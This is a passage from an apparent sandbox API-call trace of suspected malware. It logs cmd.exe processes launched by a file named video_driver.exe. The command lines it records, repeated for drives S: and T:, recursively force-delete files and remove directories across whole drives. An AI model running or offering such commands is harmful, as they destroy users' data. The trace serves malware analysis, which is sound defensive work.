lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x40, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x40, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x0, lpData=0x38ec08*=0x40, lpcbData=0x38ec00*=0x1000) returned 0x2 [0065.318] RegCloseKey (hKey=0x68) returned 0x0 [0065.318] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38ebfc | out: phkResult=0x38ebfc*=0x68) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x0, lpData=0x38ec08*=0x40, lpcbData=0x38ec00*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x1, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x0, lpData=0x38ec08*=0x1, lpcbData=0x38ec00*=0x1000) returned 0x2 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x0, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x9, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.318] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x4, lpData=0x38ec08*=0x9, lpcbData=0x38ec00*=0x4) returned 0x0 [0065.319] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38ec04, lpData=0x38ec08, lpcbData=0x38ec00*=0x1000 | out: lpType=0x38ec04*=0x0, lpData=0x38ec08*=0x9, lpcbData=0x38ec00*=0x1000) returned 0x2 [0065.319] RegCloseKey (hKey=0x68) returned 0x0 [0065.319] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6b [0065.319] srand (_Seed=0x5eb34b6b) [0065.319] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q" [0065.319] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"S:\" del /f /s /q \"S:\" & FOR /D %p IN (\"S:\") DO rmdir \"%p\" /s /q" [0065.319] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.319] GetProcessHeap () returned 0x690000 [0065.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a20f8 [0065.319] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.319] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0065.320] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.320] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.320] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0065.320] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0065.320] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0065.320] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0065.320] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0065.320] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0065.320] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0065.320] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.320] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0065.320] GetProcessHeap () returned 0x690000 [0065.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2bd0 | out: hHeap=0x690000) returned 1 [0065.320] GetEnvironmentStringsW () returned 0x6a2310* [0065.320] GetProcessHeap () returned 0x690000 [0065.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xae2) returned 0x6a4c70 [0065.320] FreeEnvironmentStringsW (penv=0x6a2310) returned 1 [0065.320] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.320] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.321] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.321] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.321] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.321] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.321] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.321] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.321] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.321] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.321] GetProcessHeap () returned 0x690000 [0065.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a17c8 [0065.321] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x38f9c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.321] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x38f9c8, lpFilePart=0x38f9c4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x38f9c4*="Desktop") returned 0x25 [0065.321] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.321] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x38f744 | out: lpFindFileData=0x38f744*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a5760 [0065.322] FindClose (in: hFindFile=0x6a5760 | out: hFindFile=0x6a5760) returned 1 [0065.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x38f744 | out: lpFindFileData=0x38f744*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6a5760 [0065.322] FindClose (in: hFindFile=0x6a5760 | out: hFindFile=0x6a5760) returned 1 [0065.322] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0065.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x38f744 | out: lpFindFileData=0x38f744*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a5760 [0065.322] FindClose (in: hFindFile=0x6a5760 | out: hFindFile=0x6a5760) returned 1 [0065.323] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.323] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0065.323] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0065.323] GetProcessHeap () returned 0x690000 [0065.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4c70 | out: hHeap=0x690000) returned 1 [0065.323] GetEnvironmentStringsW () returned 0x6a4180* [0065.323] GetProcessHeap () returned 0x690000 [0065.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb36) returned 0x6a5fa0 [0065.323] FreeEnvironmentStringsW (penv=0x6a4180) returned 1 [0065.323] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.323] GetProcessHeap () returned 0x690000 [0065.323] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a17c8 | out: hHeap=0x690000) returned 1 [0065.323] GetProcessHeap () returned 0x690000 [0065.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x6a6ae0 [0065.324] GetProcessHeap () returned 0x690000 [0065.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa0) returned 0x6a2e50 [0065.324] GetProcessHeap () returned 0x690000 [0065.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ae0 | out: hHeap=0x690000) returned 1 [0065.324] GetConsoleOutputCP () returned 0x1b5 [0065.324] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.325] GetUserDefaultLCID () returned 0x409 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x38fb08, cchData=128 | out: lpLCData="0") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x38fb08, cchData=128 | out: lpLCData="0") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x38fb08, cchData=128 | out: lpLCData="1") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0065.326] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0065.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0065.327] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.328] GetProcessHeap () returned 0x690000 [0065.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x6a2ef8 [0065.328] GetConsoleTitleW (in: lpConsoleTitle=0x6a2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0065.329] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.329] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0065.329] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0065.329] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0065.329] GetProcessHeap () returned 0x690000 [0065.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x6a6ae0 [0065.330] GetProcessHeap () returned 0x690000 [0065.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x6aaaf8 [0065.330] GetProcessHeap () returned 0x690000 [0065.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1a) returned 0x6a57e0 [0065.330] GetEnvironmentVariableW (in: lpName="p IN (\"S", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="CD") returned 13 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="ERRORLEVEL") returned 11 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="CMDEXTVERSION") returned 13 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="CMDCMDLINE") returned 13 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="DATE") returned 12 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="TIME") returned -4 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="RANDOM") returned -2 [0065.330] _wcsicmp (_String1="p IN (\"S", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.330] GetProcessHeap () returned 0x690000 [0065.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a57e0 | out: hHeap=0x690000) returned 1 [0065.331] GetProcessHeap () returned 0x690000 [0065.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aaaf8 | out: hHeap=0x690000) returned 1 [0065.331] GetProcessHeap () returned 0x690000 [0065.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x6aaaf8 [0065.331] GetProcessHeap () returned 0x690000 [0065.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aaaf8 | out: hHeap=0x690000) returned 1 [0065.331] GetProcessHeap () returned 0x690000 [0065.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ae0 | out: hHeap=0x690000) returned 1 [0065.331] _wcsicmp (_String1="if", _String2=")") returned 64 [0065.331] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0065.331] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0065.331] _wcsicmp (_String1="IF", _String2="if") returned 0 [0065.331] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0065.331] GetProcessHeap () returned 0x690000 [0065.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3110 [0065.332] GetProcessHeap () returned 0x690000 [0065.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe) returned 0x69ffc0 [0065.332] GetProcessHeap () returned 0x690000 [0065.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x20) returned 0x6a57e0 [0065.333] GetProcessHeap () returned 0x690000 [0065.333] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a57e0, Size=0x16) returned 0x6a1800 [0065.333] GetProcessHeap () returned 0x690000 [0065.333] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a1800) returned 0x16 [0065.333] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0065.333] GetProcessHeap () returned 0x690000 [0065.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3170 [0065.333] GetProcessHeap () returned 0x690000 [0065.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x14) returned 0x6a31d0 [0065.333] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0065.333] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0065.334] GetProcessHeap () returned 0x690000 [0065.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x12) returned 0x6a31f0 [0065.334] GetProcessHeap () returned 0x690000 [0065.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1c) returned 0x6a57e0 [0065.334] GetProcessHeap () returned 0x690000 [0065.334] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a57e0, Size=0x14) returned 0x6a3210 [0065.334] GetProcessHeap () returned 0x690000 [0065.334] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a3210) returned 0x14 [0065.335] _wcsicmp (_String1="del", _String2=")") returned 59 [0065.335] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0065.335] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0065.335] _wcsicmp (_String1="IF", _String2="del") returned 5 [0065.335] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0065.335] _wcsicmp (_String1="REM", _String2="del") returned 14 [0065.335] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0065.335] GetProcessHeap () returned 0x690000 [0065.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3230 [0065.335] GetProcessHeap () returned 0x690000 [0065.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x10) returned 0x69ffd8 [0065.335] GetProcessHeap () returned 0x690000 [0065.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x28) returned 0x6a3290 [0065.336] GetProcessHeap () returned 0x690000 [0065.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a32c0 [0065.337] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0065.337] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0065.337] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0065.337] GetProcessHeap () returned 0x690000 [0065.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3320 [0065.337] GetProcessHeap () returned 0x690000 [0065.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x44) returned 0x6a3380 [0065.337] GetProcessHeap () returned 0x690000 [0065.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x14) returned 0x6a33d0 [0065.337] GetProcessHeap () returned 0x690000 [0065.338] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x6a33d0, Size=0x12) returned 0x6a33d0 [0065.338] GetProcessHeap () returned 0x690000 [0065.338] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x6a33d0) returned 0x12 [0065.338] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0065.338] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0065.338] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0065.338] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0065.338] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0065.338] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0065.338] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0065.339] GetProcessHeap () returned 0x690000 [0065.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x12) returned 0x6a33f0 [0065.339] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0065.340] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0065.340] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0065.340] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0065.340] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0065.340] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0065.340] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0065.340] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0065.340] GetProcessHeap () returned 0x690000 [0065.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x6a3410 [0065.340] GetProcessHeap () returned 0x690000 [0065.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x14) returned 0x6a3470 [0065.341] GetProcessHeap () returned 0x690000 [0065.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x20) returned 0x6a57e0 [0065.342] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0065.344] GetFullPathNameW (in: lpFileName="S:", nBufferLength=0x208, lpBuffer=0x38f7f8, lpFilePart=0x38f5a4 | out: lpBuffer="S:\\", lpFilePart=0x38f5a4*=0x0) returned 0x3 [0065.344] wcsncmp (_String1="S:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -9 [0065.350] GetFileAttributesW (lpFileName="S:\\" (normalized: "s:")) returned 0xffffffff [0065.350] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.350] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.350] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.350] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.350] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.350] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.351] SetConsoleInputExeNameW () returned 0x1 [0065.351] GetConsoleOutputCP () returned 0x1b5 [0065.351] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.351] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.351] exit (_Code=0) Process: id = "40" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42427000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0xb20 [0065.439] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3efb84 | out: lpSystemTimeAsFileTime=0x3efb84*(dwLowDateTime=0x4d34960, dwHighDateTime=0x1d62400)) [0065.440] GetCurrentProcessId () returned 0xb3c [0065.440] GetCurrentThreadId () returned 0xb20 [0065.440] GetTickCount () returned 0x1147cce [0065.440] QueryPerformanceCounter (in: lpPerformanceCount=0x3efb7c | out: lpPerformanceCount=0x3efb7c*=18557314563) returned 1 [0065.442] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0065.442] __set_app_type (_Type=0x1) [0065.442] __p__fmode () returned 0x770331f4 [0065.442] __p__commode () returned 0x770331fc [0065.442] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0065.442] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0065.442] GetCurrentThreadId () returned 0xb20 [0065.442] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb20) returned 0x60 [0065.442] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.442] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0065.443] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.443] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.443] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3efb14 | out: phkResult=0x3efb14*=0x0) returned 0x2 [0065.443] VirtualQuery (in: lpAddress=0x3efb4b, lpBuffer=0x3efae4, dwLength=0x1c | out: lpBuffer=0x3efae4*(BaseAddress=0x3ef000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.443] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x3efae4, dwLength=0x1c | out: lpBuffer=0x3efae4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.443] VirtualQuery (in: lpAddress=0x2f1000, lpBuffer=0x3efae4, dwLength=0x1c | out: lpBuffer=0x3efae4*(BaseAddress=0x2f1000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.443] VirtualQuery (in: lpAddress=0x2f3000, lpBuffer=0x3efae4, dwLength=0x1c | out: lpBuffer=0x3efae4*(BaseAddress=0x2f3000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.444] VirtualQuery (in: lpAddress=0x3f0000, lpBuffer=0x3efae4, dwLength=0x1c | out: lpBuffer=0x3efae4*(BaseAddress=0x3f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0065.444] GetConsoleOutputCP () returned 0x1b5 [0065.444] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.444] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0065.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.444] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0065.444] _get_osfhandle 